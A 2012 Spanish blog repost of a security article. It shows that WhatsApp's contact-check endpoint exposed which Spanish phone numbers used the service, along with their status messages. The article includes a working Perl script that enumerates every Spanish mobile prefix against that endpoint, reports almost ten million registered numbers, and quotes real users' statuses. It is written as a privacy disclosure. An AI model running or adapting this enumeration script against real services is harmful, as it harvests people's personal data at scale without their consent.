<!DOCTYPE html>
<html>

  <head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script type="text/javascript">
 var host = "yoursite.com";
 if ((host == window.location.host) && (window.location.protocol != "https:"))
     window.location.protocol = "https";
</script>


  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <title>Casi 10 millones de móviles españoles con WhatsApp instalado</title>
  <meta name="description" content="Artículo de Alejandro Ramos publicado en Security By Default, espacio donde poder compartir experiencias y hablar de los aspectos técnicos relacionados con l...">

  <link rel="stylesheet" href="/css/main.css">
  <link rel="canonical" href="https://blog.infotics.es/2012/03/06/casi-10-millones-de-moviles-espanoles-con-whatsapp-instalado/">
  <link rel="canonical" href="%7B%20%7B%20site.url%20%7D%20%7D%7B%20%7B%20page.url%20%7D%20%7D">
  <link rel="alternate" type="application/rss+xml" title="Infotics" href="https://blog.infotics.es/feed.xml">



  </head>
<body>

    <header class="site-header">

  <div class="wrapper">

    <h1><a class="site-title" href="/">Infotics</a></h1>

    <nav class="site-nav">
      <a href="#" class="menu-icon">
        <svg viewbox="0 0 18 15">
          <path fill="#424242" d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.031C17.335,0,18,0.665,18,1.484L18,1.484z"></path>
          <path fill="#424242" d="M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0c0-0.82,0.665-1.484,1.484-1.484 h15.031C17.335,6.031,18,6.696,18,7.516L18,7.516z"></path>
          <path fill="#424242" d="M18,13.516C18,14.335,17.335,15,16.516,15H1.484C0.665,15,0,14.335,0,13.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.031C17.335,12.031,18,12.696,18,13.516L18,13.516z"></path>
        </svg>
      </a>

      <div class="trigger">
        
          
          <a class="page-link" href="/about/">About</a>
          
        
          
        
          
        
          
        
          
        
      </div>
    </nav>

  </div>

</header>


    <div class="page-content">
      <div class="wrapper">
        <div class="post">

  <header class="post-header">
    <h1 class="post-title">Casi 10 millones de móviles españoles con WhatsApp instalado</h1>
    <p class="post-meta">Mar 6, 2012 • Adolfo Antón Bravo</p>
  </header>

  <article class="post-content">
    <p>Artículo de [Alejandro Ramos][1] publicado en [Security By Default][2], <cite>espacio donde poder compartir experiencias y hablar de los aspectos técnicos relacionados con la seguridad informática</cite>, con [licencia Creative Commons Reconocimiento-No Comercial España][3] el [2 de marzo de 2012][4].<br>
Hemos realizado ligeros cambios -cursivas, negritas, enlaces- en la edición en aras de una mejor comprensión del texto.<br>
No hemos cambiado el título aunque habría que añadir a <cite>Casi 10 millones de móviles españoles con WhatsApp instalado</cite>, constituyen un peligro para la privacidad de lxs usuarixs. Lo reproducimos porque nos parece muy importante que lxs usuarixs sepamos los problemas que tienen las aplicaciones que usamos, los riesgos que conlleva dejarse llevar por la moda de un uso masivo irreflexivo y sin ninguna postura crítica. Realmente WhatsApp hace algo que con [Jabber][5] ya se puede hacer, bien sea en un servidor comercial como de hecho hace Google con Ytalk, bien en un servidor cooperativo o comunitario como [Jabberes.org][6]. Sin embargo, la facilidad de uso, el boca-oreja y sobre todo la moda ha hecho de WhatsApp la aplicación instalada en diez millones de móviles de España. ¿Qué ocurre con la tecnología y el uso que hacemos de ella?</p>
<figure style="width: 531px;" class="wp-caption alignnone">[<img alt="Whatsapp, fondo de escritorio por http://www.flickr.com/photos/abulhussain/5017703003/sizes/o/in/photostream/" src="http://i1.wp.com/blogs.cuartocanal.es/infotics/files/2012/03/5017703003_75e1edf347_o.png?resize=531%2C278" title="Whatsapp, fondo de escritorio por http://www.flickr.com/photos/abulhussain/5017703003/sizes/o/in/photostream/" data-recalc-dims="1">][7]<figcaption class="wp-caption-text">Whatsapp, fondo de escritorio por http://www.flickr.com/photos/abulhussain/5017703003/sizes/o/in/photostream/</figcaption></figure>

<h2 id="casi-10-millones-de-mviles-espaoles-con-whatsapp-instalado">Casi 10 millones de móviles españoles con WhatsApp instalado</h2>

<p>¡Qué pesados somos con [whatsapp][8]! Ya, bueno, eso es mentira. Realmente somos pesados con todo. Haciendo algunos ejercicios con aplicaciones de [iPhone][9], me dio por mirar  un poco <strong>WhatsApp</strong>, como [ya hiciera Yago][10] o [Alberto antes][11], pero es que la aplicación da tanto juego, que se puede hablar de ella muchas más veces.<br>
Una de las cosas que observé en ese análisis es que cuando arranca, comprueba el estado de tus contactos y de esa forma, sabe qué personas de tu agenda usan el servicio. Esta petición se realiza mediante <em>HTTPS</em> contra su <em>servidor web</em> con una llamada muy simple a la <em>URL</em>: <a href="https://sro.whatsapp.net/client/iphone/iq.php">https://sro.whatsapp.net/client/iphone/iq.php</a>, que devuelve un <code class="highlighter-rouge">plist</code> con sus mensajes y disponibilidad.<br>
`<br></p>
<dict><br>
<key>P</key><br>
<string>+34600000158</string><br>
<key>T</key><br>
<integer>6151511</integer><br>
<key>S</key><br>
<string>Hey there! I am using WhatsApp.</string><br>
<key>JID</key><br>
<string>34600000158</string><br>
<key>NP</key><br>
<true></true><br>
</dict>
<p><br>
`<br>
El resto de esta entrada,  pues ya os lo podéis imaginar: <em>script</em> en <em>perl</em>, lista de teléfonos registrados de España y a probar y cotillear cuantos hay usando el servicio y qué estados graciosos hay. ¿Aburrido? No, ¡inquieto!<br>
La lista de prefijos de teléfono registrados es pública y se puede descargar en un fichero <em>zip</em> de esta página web: [http://www.cmt.es/cmt_ptl_ext/SelectOption.do?nav=bases&amp;categoria=descarga][12]<br>
<a href="http://i0.wp.com/4.bp.blogspot.com/-YI0Z9dKpQJU/T1CtxLMa-cI/AAAAAAAAGwA/xS7F65JKwgs/s1600/cmt.png" data-rel="lightbox-0" title=""><img src="http://i1.wp.com/blogs.cuartocanal.es/infotics/files/2012/03/cmt.png?resize=320%2C165" alt="" border="0" data-recalc-dims="1"></a><br>
El <em>script</em> en <em>perl</em> no es que soporte <em>threads</em> ni sea nada del otro mundo, pero oye… funciona.<br>
`&lt;/p&gt;</p>
<p>#!/usr/bin/perl<br>
use LWP::UserAgent;<br>
my $ua = new LWP::UserAgent;<br>
open A,"num.txt";<br>
my <a href="https://github.com/a" class="user-mention">@a</a>=<a>;<br>
my $i=0;<br>
foreach my $b (@a){<br>
chomp $b;<br>
foreach $g (0..99) {<br>
$i++;<br>
my $post="";<br>
$post="cd=1&amp;cc=34&amp;me=600000000";<br>
foreach(0..9999) {<br>
$post .= sprintf ("&amp;u%%5B%%5D=%%2B34$b%02d%04d",$g,$_);<br>
}<br>
print "get $in";<br>
my $req = new HTTP::Request 'POST','https://sro.whatsapp.net/client/iphone/iq.php';<br>
$req-&gt;content_type('application/x-www-form-urlencoded');<br>
$req-&gt;content("$post");<br>
my $res = $ua-&gt;request($req);<br>
print $res-&gt;as_string;<br>
}<br>
}<br>
`  
El resultado, cuando lo ejecuté el 10 de febrero y tras generar un *log* de 2 *Gb*: **9.832.654** de números registrados.

Y algunos estados de gente graciosos:

**HACKERS:**

<string>pirateando conversaciones, menuda hacker</string>  
<string>Xx\_Hackero\_xX</string>  
<string>The Mind Hackers is Here!!!</string>  
<string>HACKERMAN !!!</string>  
<string>I’m not a Hacker, I’m a "Security Professional"</string>  
<string>Hacker</string>  
<string>\*\\*\* Hacker. Hacker \*\**</string>  
<string>Hacker mater</string>  
<string>hacker</string>  
<string>Hacker î  
</string>  
<string>Heart Hacker Rembo Now Is Here</string>  
<string>Hacker</string>  
<string>Soy una hacker!!!!…patosa!!!î  
</string>  
<string>MaDr!D HaCKeR</string>  
<string>De Hacker por la Red</string>  
<string>Hacker</string>  
<string>The HACKER</string>  
<string>De examenes toda la semana.. Certified Ethical Hacker</string>  
<string>Don’t Panic! A ‘hacker’ is different from a ‘cracker’.</string>  
<string>Te reviento hacker!! Jaja</string>  
<string>~Hacker~</string>  
<string>android hacker</string>  
<string>@andyyhacker</string>  
<string>Quien viene a ver Hackers?????</string>  
<string>Hacker, Blade Runner.</string>  
<string>ahhahah soy un porulo hacker :Pî  
½</string>  
<string>Hackerdelmelo is hacking OFM</string>  
<string>Saber romper medidas de seguridad no hacen k seas hacker al igual que saber hacer un puente en un coche no te convierte en un ingeniero</string>  
<string>Me sty volviendo hacker</string>  
<string>Xx\_putoshackers\_xX</string>  
<string>el puto hacker</string>  
<string>î®HACKERî®</string>  
<string>Y si, morire de frio o de sueÃ±o, quiero ser hacker u3u</string>  
<string>el hacker crea y el gobierno destruye</string>  
<string>VOTAD x ROLLING HACKERS!!!</string>  
<string>Los hackers son los padres</string>  
<string>CagÃ¼en el hacker…</string>  
<string>îMarzo Negro.contra la ley sopa.ANONYMUS planea el mayor atake hacker</string>  
<string>Certified Ethical Hacker</string>  
<string>Mi Objetivo: Hacker de la vida</string>

**SECURITY**

<string>I’m not a Hacker, I’m a "Security Professional"</string>  
<string>Ibiza Security</string>  
<string>Shadows Are Security</string>  
<string>Buguroo Offensive Security</string>  
<string>Gordo Te amo (L) bailar,bailar,bailar! Security dance! <img src="http://i1.wp.com/blogs.cuartocanal.es/infotics/wp-includes/images/smilies/simple-smile.png?w=660" alt=":)" class="wp-smiley" style="height: 1em; max-height: 1em;" data-recalc-dims="1"> mucha fiesta y muchas actuaciones! :p</string>  
<string>the security men</string>  
<string>SecurityViolationException: empty head on ‘remote_user’:47</string>  
<string>Panda Security – cloudantivirus.com</string>  
<string>Ibiza Security</string>  
<string>Your Security is my Business…</string>  
<string>Paid off security and got through the gate…</string>  
<string>I’ll be ur security!!</string>  
<string>security!!!! ai ai ai ai</string>  
<string>security private î  
con dos cojones vamos a x elloî</string>  
<string>Grupo Security Dogs</string>  
<string>internet and security terrorims</string>

Y finalmente, uno de mis favoritos:

**&lt;****string&gt;Yo no digo que esa chica sea un poco suelta, solo digo que si su entrepierna tuviera contraseña, serí­a ‘1234’**&lt;**/string****&gt;**

 [1]: http://www.twitter.com/aramosf
 [2]: http://www.securitybydefault.com/
 [3]: http://creativecommons.org/licenses/by-nc/2.5/es/
 [4]: http://www.securitybydefault.com/2012/03/casi-10-millones-de-moviles-espanoles.html
 [5]: http://www.jabber.org/
 [6]: http://www.jabberes.org/
 [7]: http://www.flickr.com/photos/abulhussain/5017703003/sizes/o/in/photostream/
 [8]: http://www.whatsapp.com/
 [9]: http://store.apple.com/es/browse/home/shop_iphone/family/iphone
 [10]: http://www.securitybydefault.com/2011/06/lo-que-no-te-cuenta-whatsapp.html
 [11]: http://www.securitybydefault.com/2012/01/whatsapp-al-descubierto.html
 [12]: http://www.cmt.es/cmt_ptl_ext/SelectOption.do?nav=bases&amp;categoria=descarga
</a></p>

  </article>

</div>

      </div>
    </div>

    <footer class="site-footer">

  <div class="wrapper">

    <h2 class="footer-heading">Infotics</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col  footer-col-1">
        <ul class="contact-list">
          <li>Infotics</li>
          <li><a href="mailto:adolflow@sindominio.net">adolflow@sindominio.net</a></li>
        </ul>
      </div>

      <div class="footer-col  footer-col-2">
        <ul class="social-media-list">
          
          <li>
            <a href="https://github.com/flowsta">
              <span class="icon  icon--github">
                <svg viewbox="0 0 16 16">
                  <path fill="#828282" d="M7.999,0.431c-4.285,0-7.76,3.474-7.76,7.761 c0,3.428,2.223,6.337,5.307,7.363c0.388,0.071,0.53-0.168,0.53-0.374c0-0.184-0.007-0.672-0.01-1.32 c-2.159,0.469-2.614-1.04-2.614-1.04c-0.353-0.896-0.862-1.135-0.862-1.135c-0.705-0.481,0.053-0.472,0.053-0.472 c0.779,0.055,1.189,0.8,1.189,0.8c0.692,1.186,1.816,0.843,2.258,0.645c0.071-0.502,0.271-0.843,0.493-1.037 C4.86,11.425,3.049,10.76,3.049,7.786c0-0.847,0.302-1.54,0.799-2.082C3.768,5.507,3.501,4.718,3.924,3.65 c0,0,0.652-0.209,2.134,0.796C6.677,4.273,7.34,4.187,8,4.184c0.659,0.003,1.323,0.089,1.943,0.261 c1.482-1.004,2.132-0.796,2.132-0.796c0.423,1.068,0.157,1.857,0.077,2.054c0.497,0.542,0.798,1.235,0.798,2.082 c0,2.981-1.814,3.637-3.543,3.829c0.279,0.24,0.527,0.713,0.527,1.437c0,1.037-0.01,1.874-0.01,2.129 c0,0.208,0.14,0.449,0.534,0.373c3.081-1.028,5.302-3.935,5.302-7.362C15.76,3.906,12.285,0.431,7.999,0.431z"></path>
                </svg>
              </span>

              <span class="username">flowsta</span>
            </a>
          </li>
          

          
          <li>
            <a href="https://twitter.com/adolflow">
              <span class="icon  icon--twitter">
                <svg viewbox="0 0 16 16">
                  <path fill="#828282" d="M15.969,3.058c-0.586,0.26-1.217,0.436-1.878,0.515c0.675-0.405,1.194-1.045,1.438-1.809
                  c-0.632,0.375-1.332,0.647-2.076,0.793c-0.596-0.636-1.446-1.033-2.387-1.033c-1.806,0-3.27,1.464-3.27,3.27 c0,0.256,0.029,0.506,0.085,0.745C5.163,5.404,2.753,4.102,1.14,2.124C0.859,2.607,0.698,3.168,0.698,3.767 c0,1.134,0.577,2.135,1.455,2.722C1.616,6.472,1.112,6.325,0.671,6.08c0,0.014,0,0.027,0,0.041c0,1.584,1.127,2.906,2.623,3.206 C3.02,9.402,2.731,9.442,2.433,9.442c-0.211,0-0.416-0.021-0.615-0.059c0.416,1.299,1.624,2.245,3.055,2.271 c-1.119,0.877-2.529,1.4-4.061,1.4c-0.264,0-0.524-0.015-0.78-0.046c1.447,0.928,3.166,1.469,5.013,1.469 c6.015,0,9.304-4.983,9.304-9.304c0-0.142-0.003-0.283-0.009-0.423C14.976,4.29,15.531,3.714,15.969,3.058z"></path>
                </svg>
              </span>

              <span class="username">adolflow</span>
            </a>
          </li>
          
        </ul>
      </div>

      <div class="footer-col  footer-col-3">
        <p class="text">Transversalidad de la información y las tecnologías
</p>
      </div>
    </div>

  </div>

</footer>


  </body>

</html>
